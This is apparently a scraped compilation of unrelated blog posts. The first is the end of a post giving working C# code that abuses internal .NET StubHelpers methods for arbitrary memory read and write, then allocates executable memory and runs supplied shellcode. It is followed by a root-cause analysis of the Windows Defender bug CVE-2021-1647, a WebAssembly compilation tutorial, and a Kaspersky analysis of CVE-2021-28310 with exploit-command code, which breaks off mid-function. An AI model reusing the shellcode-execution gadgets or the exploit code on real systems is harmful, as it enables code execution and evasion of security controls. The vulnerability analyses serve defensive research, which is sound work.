using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ReadGadget
{
public static IntPtr ReadMemory(IntPtr addr)
{
var stubHelper = typeof(System.String).Assembly.GetType(«System.StubHelpers.StubHelpers»);
var GetNDirectTarget = stubHelper.GetMethod(«GetNDirectTarget», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Spray away
IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
for (int i = 0; i < 200; i += IntPtr.Size)
{
Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
}
return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}
}
}

view rawReadGadget.cs hosted with ❤ by GitHub

And if we run this:

Awesome, so we have our first example of a gadget which can be useful to interact with unmanaged memory. Next, we should think about how to write memory. Again if we review potential FCalls and QCalls it doesn’t take long to stumble over several candidates, including System.StubHelpers.MngdRefCustomMarshaler.CreateMarshaler:

Following the execution path we find that this results in the execution of the method MngdRefCustomMarshaler::CreateMarshaler:

And again, if we look at what this method does within native code:

Checking on MngRefCustomMarshalaer, we find that the m_pCMHelper is the only member variable present in the class:

So, this one is easy, we can write 8 bytes to any memory location as we control both pThis and pCMHelper. The code to do this looks something like this:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace NautilusProject
{
public class WriteGadget
{
public static void WriteMemory(IntPtr addr, IntPtr value)
{
var mngdRefCustomeMarshaller = typeof(System.String).Assembly.GetType(«System.StubHelpers.MngdRefCustomMarshaler»);
var CreateMarshaler = mngdRefCustomeMarshaller.GetMethod(«CreateMarshaler», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
CreateMarshaler.Invoke(null, new object[] { addr, value });
}
}
}

view rawWriteGadget.cs hosted with ❤ by GitHub

Let’s have some fun and use this gadget to modify the length of a System.String object to show the control we have to modify arbitrary memory bytes:

OK, so now we have our 2 (of MANY possible) gadgets, what would it looks like if we transplanted this into our code execution example? Well, we end up with something pretty weird:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Linq;
namespace NautilusProject
{
internal class CombinedExec
{
public static IntPtr AllocMemory(int length)
{
var kernel32 = typeof(System.String).Assembly.GetType(«Interop+Kernel32»);
var VirtualAlloc = kernel32.GetMethod(«VirtualAlloc», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
IntPtr mem = (IntPtr)ptr.GetType().GetMethod(«GetPointerValue», BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
return mem;
}
public static void WriteMemory(IntPtr addr, IntPtr value)
{
var mngdRefCustomeMarshaller = typeof(System.String).Assembly.GetType(«System.StubHelpers.MngdRefCustomMarshaler»);
var CreateMarshaler = mngdRefCustomeMarshaller.GetMethod(«CreateMarshaler», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
CreateMarshaler.Invoke(null, new object[] { addr, value });
}
public static IntPtr ReadMemory(IntPtr addr)
{
var stubHelper = typeof(System.String).Assembly.GetType(«System.StubHelpers.StubHelpers»);
var GetNDirectTarget = stubHelper.GetMethod(«GetNDirectTarget», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
for (int i = 0; i < 200; i += IntPtr.Size)
{
Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
}
return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}
public static void CopyMemory(byte[] source, IntPtr dest)
{
// Pad to IntPtr length
if ((source.Length % IntPtr.Size) != 0)
{
source = source.Concat<byte>(new byte[source.Length % IntPtr.Size]).ToArray();
}
GCHandle pinnedArray = GCHandle.Alloc(source, GCHandleType.Pinned);
IntPtr sourcePtr = pinnedArray.AddrOfPinnedObject();
for (int i = 0; i < source.Length; i += IntPtr.Size)
{
WriteMemory(dest + i, ReadMemory(sourcePtr + i));
}
}
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var ecBase = ReadMemory(t.TypeHandle.Value + 0x28);
var mdcBase = ReadMemory(ecBase + 0x20);
IntPtr stub = ReadMemory(mdcBase + 0x18 + 8);
var kernel32 = typeof(System.String).Assembly.GetType(«Interop+Kernel32»);
var VirtualAlloc = kernel32.GetMethod(«VirtualAlloc», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
IntPtr mem = (IntPtr)ptr.GetType().GetMethod(«GetPointerValue», BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
CopyMemory(shellcode, mem);
CopyMemory(jmpCode, stub);
WriteMemory(stub + 2, mem);
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
}
public static class Internals
{
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}

view rawDogFoodExec.cs hosted with ❤ by GitHub

And of course, if we execute this, we end up with our desired result of unmanaged code execution:

A project providing all examples in this post can be found here.

With the size of the .NET framework, this of course only scratches the surface, but hopefully has given you a few ideas about how we can abuse some pretty benign looking functions to achieve unmanaged code execution in weird ways. Have fun!

CVE-2021-1647: Windows Defender mpengine remote code execution

Microsoft Defender Remote Code Execution Vulnerability

Original text by Maddie Stone

The Basics

Disclosure or Patch Date: 12 January 2021

Product: Microsoft Windows Defender

Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647

Affected Versions: Version 1.1.17600.5 and previous

First Patched Version: Version 1.1.17700.4

Issue/Bug Report: N/A

Patch CL: N/A

Bug-Introducing CL: N/A

Reporter(s): Anonymous

The Code

Proof-of-concept:

Exploit sample: 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Heap buffer overflow

Vulnerability details:

There is a heap buffer overflow when Windows Defender (mpengine.dll) processes the section table when unpacking an ASProtect packed executable. Each section entry has two values: the virtual address and the size of the section. The code in CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects only checks if the next section entry’s address is lower than the previous one, not if they are equal. This means that if you have a section table such as the one used in this exploit sample: [ (0,0), (0,0), (0x2000,0), (0x2000,0x3000) ], 0 bytes are allocated for the section at address 0x2000, but when it sees the next entry at 0x2000, it simply skips over it without exiting nor updating the size of the section. 0x3000 bytes will then be copied to that section during the decompression, leading to the heap buffer overflow.

if ( next_sect_addr > sect_addr )// current va is greater than prev (not also eq)
{
    sect_addr = next_sect_addr;
    sect_sz = (next_sect_sz + 0xFFF) & 0xFFFFF000;
} 
// if next_sect_addr <= sect_addr we continue on to next entry in the table 

[...]
			new_sect_alloc = operator new[](sect_sz + sect_addr);// allocate new section
[...]

Patch analysis: There are quite a few changes to the function CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects between version 1.1.17600.5 (vulnerable) and 1.1.17700.4 (patched). The directly related change was to add an else branch to the comparison so that if any entry in the section array has an address less than or equal to the previous entry, the code will error out and exit rather than continuing to decompress.

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

It seems possible that this vulnerability was found through fuzzing or manual code review. If the ASProtect unpacking code was included from an external library, that would have made the process of finding this vulnerability even more straightforward for both fuzzing & review.

(Historical/present/future) context of bug:

The Exploit

(The terms exploit primitiveexploit strategyexploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

  1. The heap buffer overflow is used to overwrite the data in an object stored as the first field in the lfind_switch object which is allocated in the lfind_switch::switch_out function.
  2. The two fields that were overwritten in the object pointed to by the lfind_switch object are used as indices in lfind_switch::switch_in. Due to no bounds checking on these indices, another out-of-bounds write can occur.
  3. The out of bounds write in step 2 performs an or operation on the field in the VMM_context_t struct (the virtual memory manager within Windows Defender) that stores the length of a table that tracks the virtual mapped pages. This field usually equals the number of pages mapped * 2. By performing the ‘or’ operations, the value in the that field is increased (for example from 0x0000000C to 0x0003030c. When it’s increased, it allows for an additional out-of-bounds read & write, used for modifying the memory management struct to allow for arbitrary r/w.

Exploit flow:

The exploit uses «primitive bootstrapping» to to use the original buffer overflow to cause two additional out-of-bounds writes to ultimately gain arbitrary read/write.

Known cases of the same exploit flow: Unknown.

Part of an exploit chain? Unknown.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

  • Review ASProtect unpacker for additional parsing bugs.
  • Review and/or fuzz other unpacking code for parsing and memory issues.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

  • Building mpengine.dll with ASAN enabled should allow for this bug class to be caught.
  • Open sourcing unpackers could allow more folks to find issues in this code, which could potentially detect issues like this more readily.

Ideas to mitigate the exploit flow:

  • Adding bounds checking to anywhere indices are used. For example, if there had been bounds checking when using indices in lfind_switch::switch_in, it would have prevented the 2nd out-of-bounds write which allowed this exploit to modify the VMM_context_t structure.

Other potential improvements:

It appears that by default the Windows Defender emulator runs outside of a sandbox. In 2018, there was this article that Windows Defender Antivirus can now run in a sandbox. The article states that when sandboxing is enabled, you will see a content process MsMpEngCp.exe running in addition to MsMpEng.exe. By default, on Windows 10 machines, I only see MsMpEng.exe running as SYSTEM. Sandboxing the anti-malware emulator by default, would make this vulnerability more difficult to exploit because a sandbox escape would then be required in addition to this vulnerability.

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

  • Detecting these types of 0-days will be difficult due to the sample simply dropping a new file with the characteristics to trigger the vulnerability, such as a section table that includes the same virtual address twice. The exploit method also did not require anything that especially stands out.

Other References

Compiling C without webassembly

Compiling C without webassembly

Original text by Surma

A compiler is just a part of Emscripten. What if we stripped away all the bells and whistles and used just the compiler?

Emscripten is a compiler toolchain for C/C++ targeting WebAssembly. But it does so much more than just compiling. Emscripten’s goal is to be a drop-in replacement for your off-the-shelf C/C++ compiler and make code that was not written for the web run on the web. To achieve this, Emscripten emulates an entire POSIX operating system for you. If your program uses fopen(), Emscripten will bundle the code to emulate a filesystem. If you use OpenGL, Emscripten will bundle code that creates a C-compatible GL context backed by WebGL. That requires a lot of work and also amounts in a lot of code that you need send over the wire. What if we just,… didn’t?

The compiler in Emscripten’s toolchain, the program that translates C code to WebAssembly byte-code, is LLVM. LLVM is a modern, modular compiler framework. LLVM is modular in the sense that it never compiles one language straight to machine code. Instead, it has a front-end compiler that compiles your code to an intermediate representation (IR). This IR is called LLVM, as the IR is modeled around a Low-level Virtual Machine, hence the name of the project. The back-end compiler then takes care of translating the IR to the host’s machine code. The advantage of this strict separation is that adding support for a new architecture “merely” requires adding a new back-end compiler. WebAssembly, in that sense, is just one of many targets that LLVM supports and has been available behind a flag for a while. Since version 8 of LLVM the WebAssembly target is available by default. If you are on MacOS, you can install LLVM using homebrew:

$ brew install llvm
$ brew link --force llvm

To make sure you have WebAssembly support, we can go and check the back-end compiler:

$ llc --version
LLVM (http://llvm.org/):
  LLVM version 8.0.0
  Optimized build.
  Default target: x86_64-apple-darwin18.5.0
  Host CPU: skylake

  Registered Targets:
    # … OMG so many architectures …
    systemz    - SystemZ
    thumb      - Thumb
    thumbeb    - Thumb (big endian)
    wasm32     - WebAssembly 32-bit # 🎉🎉🎉
    wasm64     - WebAssembly 64-bit
    x86        - 32-bit X86: Pentium-Pro and above
    x86-64     - 64-bit X86: EM64T and AMD64
    xcore      - XCore

Seems like we are good to go!

Compiling C the hard way

Note: We’ll be looking at some low-level file formats like raw WebAssembly here. If you are struggling with that, that is ok. You don’t need to understand this entire blog post to make good use of WebAssembly. If you are here for the copy-pastables, look at the compiler invocation in the “Optimizing” section. But if you are interested, keep going! I also wrote an introduction to Raw Webassembly and WAT previously which covers the basics needed to understand this post.

Warning: I’ll bend over backwards here for a bit and use human-readable formats for every step of the process (as much as possible). Our program for this journey is going to be super simple to avoid edge cases and distractions:

// Filename: add.c
int add(int a, int b) {
  return a*a + b;
}

What a mind-boggling feat of engineering! Especially because it’s called “add” but doesn’t actually add. More importantly: This program makes no use of C’s standard library and only uses `int` as a type.

Turning C into LLVM IR

The first step is to turn our C program into LLVM IR. This is the job of the front-end compiler clang that got installed with LLVM:

clang \
  --target=wasm32 \ # Target WebAssembly
  -emit-llvm \ # Emit LLVM IR (instead of host machine code)
  -c \ # Only compile, no linking just yet
  -S \ # Emit human-readable assembly rather than binary
  add.c

And as a result we get add.ll containing the LLVM IR. I’m only showing this here for completeness sake. When working with WebAssembly, or even with clang when developing C, you never get into contact with LLVM IR.

; ModuleID = 'add.c'
source_filename = "add.c"
target datalayout = "e-m:e-p:32:32-i64:64-n32:64-S128"
target triple = "wasm32"

; Function Attrs: norecurse nounwind readnone
define hidden i32 @add(i32, i32) local_unnamed_addr #0 {
  %3 = mul nsw i32 %0, %0
  %4 = add nsw i32 %3, %1
  ret i32 %4
}

attributes #0 = { norecurse nounwind readnone "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-frame-pointer-elim"="false" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="generic" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 8.0.0 (tags/RELEASE_800/final)"}

LLVM IR is full of additional meta data and annotations, allowing the back-end compiler to make more informed decisions when generating machine code.

Turning LLVM IR into object files

The next step is invoking LLVMs backend compiler llc to turn the LLVM IR into an object file:

llc \
  -march=wasm32 \ # Target WebAssembly
  -filetype=obj \ # Output an object file
  add.ll

The output, add.o, is effectively a valid WebAssembly module and contains all the compiled code of our C file. However, most of the time you won’t be able to run object files as essential parts are still missing.

If we omitted -filetype=obj we’d get LLVM’s assembly format for WebAssembly, which is human-readable and somewhat similar to WAT. However, the tool that can consume these files, llvm-mc, does not fully support this text format yet and often fails to consume the output of llc. So instead we’ll disassemble the object files after the fact. Object files are target-specific and therefore need target-specific tool to inspect them. In the case of WebAssembly, the tool is wasm-objdump, which is part of the WebAssembly Binary Toolkit, or wabt for short.

$ brew install wabt # in case you haven’t
$ wasm-objdump -x add.o

add.o:  file format wasm 0x1

Section Details:

Type[1]:
 - type[0] (i32, i32) -> i32
Import[3]:
 - memory[0] pages: initial=0 <- env.__linear_memory
 - table[0] elem_type=funcref init=0 max=0 <- env.__indirect_function_table
 - global[0] i32 mutable=1 <- env.__stack_pointer
Function[1]:
 - func[0] sig=0 <add>
Code[1]:
 - func[0] size=75 <add>
Custom:
 - name: "linking"
  - symbol table [count=2]
   - 0: F <add> func=0 binding=global vis=hidden
   - 1: G <env.__stack_pointer> global=0 undefined binding=global vis=default
Custom:
 - name: "reloc.CODE"
  - relocations for section: 3 (Code) [1]
   - R_WASM_GLOBAL_INDEX_LEB offset=0x000006(file=0x000080) symbol=1 <env.__stack_pointer>

The output shows that our add() function is in this module, but it also contains custom sections filled with metadata and, surprisingly, a couple of imports. In the next phase, called linking, the custom sections will be analyzed and removed and the imports will be resolved by the linker.

Linking

Traditionally, the linker’s job is to assembles multiple object file into the executable. LLVM’s linker is called lld, but it has to be invoked with one of the target-specific symlinks. For WebAssembly there is wasm-ld.

wasm-ld \
  --no-entry \ # We don’t have an entry function
  --export-all \ # Export everything (for now)
  -o add.wasm \
  add.o

The output is a 262 bytes WebAssembly module.

Running it

Of course the most important part is to see that this actually works. As we did in the previous blog post, we can use a couple lines of inline JavaScript to load and run this WebAssembly module.

<!DOCTYPE html>

<script type="module">
  async function init() {
    const { instance } = await WebAssembly.instantiateStreaming(
      fetch("./add.wasm")
    );
    console.log(instance.exports.add(4, 1));
  }
  init();
</script>

If nothing went wrong, you shoud see a 17 in your DevTool’s console. We just successfully compiled C to WebAssembly without touching Emscripten. It’s also worth noting that we don’t have any glue code that is required to setup and load the WebAssembly module.

Compiling C the slightly less hard way

The numbers of steps we currently have to do to get from C code to WebAssembly is a bit daunting. As I said, I was bending over backwards for educational purposes. Let’s stop doing that and skip all the human-readable, intermediate formats and use the C compiler as the swiss-army knife it was designed to be:

clang \
  --target=wasm32 \
  -nostdlib \ # Don’t try and link against a standard library
  -Wl,--no-entry \ # Flags passed to the linker
  -Wl,--export-all \
  -o add.wasm \
  add.c

This will produce the same .wasm file as before, but with a single command.

Optimizing

Let’s take a look at the WAT of our WebAssembly module by running wasm2wat:

(module
  (type (;0;) (func))
  (type (;1;) (func (param i32 i32) (result i32)))
  (func $__wasm_call_ctors (type 0))
  (func $add (type 1) (param i32 i32) (result i32)
    (local i32 i32 i32 i32 i32 i32 i32 i32)
    global.get 0
    local.set 2
    i32.const 16
    local.set 3
    local.get 2
    local.get 3
    i32.sub
    local.set 4
    local.get 4
    local.get 0
    i32.store offset=12
    local.get 4
    local.get 1
    i32.store offset=8
    local.get 4
    i32.load offset=12
    local.set 5
    local.get 4
    i32.load offset=12
    local.set 6
    local.get 5
    local.get 6
    i32.mul
    local.set 7
    local.get 4
    i32.load offset=8
    local.set 8
    local.get 7
    local.get 8
    i32.add
    local.set 9
    local.get 9
    return)
  (table (;0;) 1 1 anyfunc)
  (memory (;0;) 2)
  (global (;0;) (mut i32) (i32.const 66560))
  (global (;1;) i32 (i32.const 66560))
  (global (;2;) i32 (i32.const 1024))
  (global (;3;) i32 (i32.const 1024))
  (export "memory" (memory 0))
  (export "__wasm_call_ctors" (func $__wasm_call_ctors))
  (export "__heap_base" (global 1))
  (export "__data_end" (global 2))
  (export "__dso_handle" (global 3))
  (export "add" (func $add)))

Wowza that’s a lot of WAT. To my suprise, the module uses memory (indicated by the i32.load and i32.store operations), 8 local variables and a couple of globals. If you think you’d be able to write a shorter version by hand, you’d probably be right. The reason this program is so big is because we didn’t have any optimizations enabled. Let’s change that:

 clang \
   --target=wasm32 \
+  -O3 \ # Agressive optimizations
+  -flto \ # Add metadata for link-time optimizations
   -nostdlib \
   -Wl,--no-entry \
   -Wl,--export-all \
+  -Wl,--lto-O3 \ # Aggressive link-time optimizations
   -o add.wasm \
   add.c

Note: Technically, link-time optimizations don’t bring us any gains here as we are only linking a single file. In bigger projects, LTO will help you keep your file size down.

After running the commands above, our .wasm file went down from 262 bytes to 197 bytes and the WAT is much easier on the eye, too:

(module
  (type (;0;) (func))
  (type (;1;) (func (param i32 i32) (result i32)))
  (func $__wasm_call_ctors (type 0))
  (func $add (type 1) (param i32 i32) (result i32)
    local.get 0
    local.get 0
    i32.mul
    local.get 1
    i32.add)
  (table (;0;) 1 1 anyfunc)
  (memory (;0;) 2)
  (global (;0;) (mut i32) (i32.const 66560))
  (global (;1;) i32 (i32.const 66560))
  (global (;2;) i32 (i32.const 1024))
  (global (;3;) i32 (i32.const 1024))
  (export "memory" (memory 0))
  (export "__wasm_call_ctors" (func $__wasm_call_ctors))
  (export "__heap_base" (global 1))
  (export "__data_end" (global 2))
  (export "__dso_handle" (global 3))
  (export "add" (func $add)))

Calling into the standard library.

Now, C without the standard library (called “libc”) is pretty rough. It seems logical to look into adding a libc as a next step, but I’m going to be honest: It’s not going to be easy. I actually won’t link against any libc in this blog post. There are a couple of libc implementations out there that we could grab, most notably glibcmusl and dietlibc. However, most of these libraries expect to run on a POSIX operating system, which implements a specific set of syscalls (calls to the system’s kernel). Since we don’t have a kernel interface in JavaScript, we’d have to implement these POSIX syscalls ourselves, probably by calling out to JavaScript. This is quite the task and I am not going to do that here. The good news is: This is exactly what Emscripten does for you.

Not all of libc’s functions rely on syscalls, of course. Functions like strlen()sin() or even memset() are implemented in plain C. That means you could use these functions or even just copy/paste their implementation from one of the libraries above.

Dynamic memory

With no libc at hand, fundamental C APIs like malloc() and free() are not available. In our unoptimized WAT above we have seen that the compiler will make use of memory if necessary. That means we can’t just use the memory however we like without risking corruption. We need to understand how that memory is used.

LLVM’s memory model

The way the WebAssembly memory is segmented is dictated by wasm-ld and might take C veterans a bit by surprise. Firstly, address 0 is technically valid in WebAssembly, but will often still be handled as an error case by a lot of C code. Secondly, the stack comes first and grows downwards (towards lower addresses) and the heap cames after and grows upwards. The reason for this is that WebAssembly memory can grow at runtime. That means there is no fixed end to place the stack or the heap at.

The layout that wasm-ld uses is the following:

A depiction of the wasm-ld’d memory layout.
The stack grows downwards and the heap grows upwards. The stack starts at __data_end, the heap starts at __heap_base. Because the stack is placed first, it is limited to a maximum size set at compile time, which is __heap_base - __data_end.

If we look back at the globals section in our WAT we can find these symbols defined. __heap_base is 66560 and __data_end is 1024. This means that the stack can grow to a maximum of 64KiB, which is not a lot. Luckily, wasm-ld allows us to configure this value:

 clang \
   --target=wasm32 \
   -O3 \
   -flto \
   -nostdlib \
   -Wl,--no-entry \
   -Wl,--export-all \
   -Wl,--lto-O3 \
+  -Wl,-z,stack-size=$[8 * 1024 * 1024] \ # Set maximum stack size to 8MiB
   -o add.wasm \
   add.c

Building an allocator

We now know that the heap region starts at __heap_base and since there is no malloc() function, we know that the memory region from there on upwards is ours to control. We can place data in there however we like and don’t have to fear corruption as the stack is growing the other way. Leaving the heap as a free-for-all can get hairy quickly, though, so usually some sort of dynamic memory management is needed. One option is to pull in a full malloc() implementation like Doug Lea’s malloc implementation, which is used by Emscripten today. There is also a couple of smaller implementations with different tradeoffs.

But why don’t we write our own malloc()? We are in this deep, we might as well. One of the simplest allocators is a bump allocator. The advantages: It’s super fast, extremely small and simple to implement. The downside: You can’t free memory. While this seems incredibly useless at first sight, I have encountered use-cases while working on Squoosh where this would have been an excellent choice. The concept of a bump allocator is that we store the start address of unused memory as a global. If the program requests n bytes of memory, we advance that marker by n and return the previous value:

extern unsigned char __heap_base;

unsigned int bump_pointer = &__heap_base;
void* malloc(int n) {
  unsigned int r = bump_pointer;
  bump_pointer += n;
  return (void *)r;
}

void free(void* p) {
  // lol
}

The globals we saw in the WAT are actually defined by wasm-ld which means we can access them from our C code as normal variables if we declare them as externWe just wrote our own malloc() in, like, 5 lines of C 😱

Note: Our bump allocator is not fully compatible with C’s malloc(). For example, we don’t make any alignment guarantees. But it’s good enough and it works, so 🤷‍♂️.

Using dynamic memory

To prove that this actually works, let’s build a C function that takes an arbitrary-sized array of numbers and calculates the sum. Not very exciting, but it does force us to use dynamic memory, as we don’t know the size of the array at build time:

int sum(int a[], int len) {
  int sum = 0;
  for(int i = 0; i < len; i++) {
    sum += a[i];
  }
  return sum;
}

The sum() function is hopefully straight forward. The more interesting question is how we can pass an array from JavaScript to WebAssembly — after all, WebAssembly only understands numbers. The general idea is to use malloc() from JavaScript to allocate a chunk of memory, copy the values into that chunk and pass the address (a number!) to where the array is located:

<!DOCTYPE html>

<script type="module">
  async function init() {
    const { instance } = await WebAssembly.instantiateStreaming(
      fetch("./add.wasm")
    );

    const jsArray = [1, 2, 3, 4, 5];
    // Allocate memory for 5 32-bit integers
    // and return get starting address.
    const cArrayPointer = instance.exports.malloc(jsArray.length * 4);
    // Turn that sequence of 32-bit integers
    // into a Uint32Array, starting at that address.
    const cArray = new Uint32Array(
      instance.exports.memory.buffer,
      cArrayPointer,
      jsArray.length
    );
    // Copy the values from JS to C.
    cArray.set(jsArray);
    // Run the function, passing the starting address and length.
    console.log(instance.exports.sum(cArrayPointer, cArray.length));
  }
  init();
</script>

When running this you should see a very happy 15 in the DevTools console, which is indeed the sum of all the number from 1 to 5.

You made it to the end. Congratulations! Again, if you feel a bit overwhelmed, that’s okay: This is not required reading. You do not need to understand all of this to be a good web developer or even to make good use of WebAssembly. But I did want to share this journey with you as it really makes you appreciate all the work that a project like Emscripten does for you. At the same time, it gave me an understanding of how small purely computational WebAssembly modules can be. The Wasm module for the array summing ended up at just 230 bytes, including an allocator for dynamic memory. Compiling the same code with Emscripten would yield 100 bytes of WebAssembly accompanied by 11K of JavaScript glue code. It took a lot of work to get there, but there might be situations where it is worth it.

Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild

Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild

Original text by Costin Raiu Boris Larin Brian Bartholomew

While analyzing the CVE-2021-1732 exploit originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor. We reported this new exploit to Microsoft in February and after confirmation that it is indeed a zero-day, it received the designation CVE-2021-28310. Microsoft released a patch to this vulnerability as a part of its April security updates.

We believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access. Unfortunately, we weren’t able to capture a full chain, so we don’t know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities.

The exploit was initially identified by our advanced exploit prevention technology and related detection records. In fact, over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone. In this blog we provide a technical analysis of the vulnerability and how the bad guys exploited it. More information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.

Technical details

CVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using DirectComposition API. DirectComposition is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.). We’ve already published a blogpost about in-the-wild zero-days abusing DirectComposition API. DirectComposition API is implemented by the win32kbase.sys driver and the names of all related syscalls start with the string “NtDComposition”.

DirectComposition syscalls in the win32kbase.sys driver

For exploitation only three syscalls are required: NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel. The NtDCompositionCreateChannel syscall initiates a channel that can be used together with the NtDCompositionProcessChannelBatchBuffer syscall to send multiple DirectComposition commands in one go for processing by the kernel in a batch mode. For this to work, commands need to be written sequentially in a special buffer mapped by NtDCompositionCreateChannel syscall. Each command has its own format with a variable length and list of parameters.

enum DCOMPOSITION_COMMAND_ID
{
ProcessCommandBufferIterator,
CreateResource,
OpenSharedResource,
ReleaseResource,
GetAnimationTime,
CapturePointer,
OpenSharedResourceHandle,
SetResourceCallbackId,
SetResourceIntegerProperty,
SetResourceFloatProperty,
SetResourceHandleProperty,
SetResourceHandleArrayProperty,
SetResourceBufferProperty,
SetResourceReferenceProperty,
SetResourceReferenceArrayProperty,
SetResourceAnimationProperty,
SetResourceDeletedNotificationTag,
AddVisualChild,
RedirectMouseToHwnd,
SetVisualInputSink,
RemoveVisualChild
};

List of command IDs supported by the function DirectComposition::CApplicationChannel::ProcessCommandBufferIterator

While these commands are processed by the kernel, they are also serialized into another format and passed by the Local Procedure Call (LPC) protocol to the Desktop Window Manager (dwm.exe) process for rendering to the screen. This procedure could be initiated by the third syscall – NtDCompositionCommitChannel.

To trigger the vulnerability the discovered exploit uses three types of commands: CreateResource, ReleaseResource and SetResourceBufferProperty.

void CreateResourceCmd(int resourceId)
{
DWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);
*buf = CreateResource;
buf[1] = resourceId;
buf[2] = PropertySet; // MIL_RESOURCE_TYPE
buf[3] = FALSE;
BatchLength += 16;
}
 
void ReleaseResourceCmd(int resourceId)
{
DWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);
*buf = ReleaseResource;
buf[1] = resourceId;
BatchLength += 8;
}
 
void SetPropertyCmd(int resourceId, bool update, int propertyId, int storageOffset, int hidword, int lodword)
{
DWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);
*buf = SetResourceBufferProperty;
buf[1] = resourceId;
buf[2] = update;
buf[3] = 20;
buf[4] = propertyId;
buf[5] = storageOffset;
buf[6] = _D2DVector2; // DCOMPOSITION_EXPRESSION_TYPE
buf[7] = hidword;
buf[8] = lodword;
BatchLength += 36;
}

Format of commands used in exploitation

Let’s take a look at the function CPropertySet::ProcessSetPropertyValue in dwmcore.dll. This function is responsible for processing the SetResourceBufferProperty command. We are most interested in the code responsible for handling DCOMPOSITION_EXPRESSION_TYPE = D2DVector2.

int CPropertySet::ProcessSetPropertyValue(CPropertySet *this, …)
{
  …
 
  if (expression_type == _D2DVector2)
  {
    if (!update)
    {
      CPropertySet::AddProperty<D2DVector2>(this, propertyId, storageOffset, _D2DVector2, value);
    }
    else
    {
      if ( storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )
      {
        goto fail;
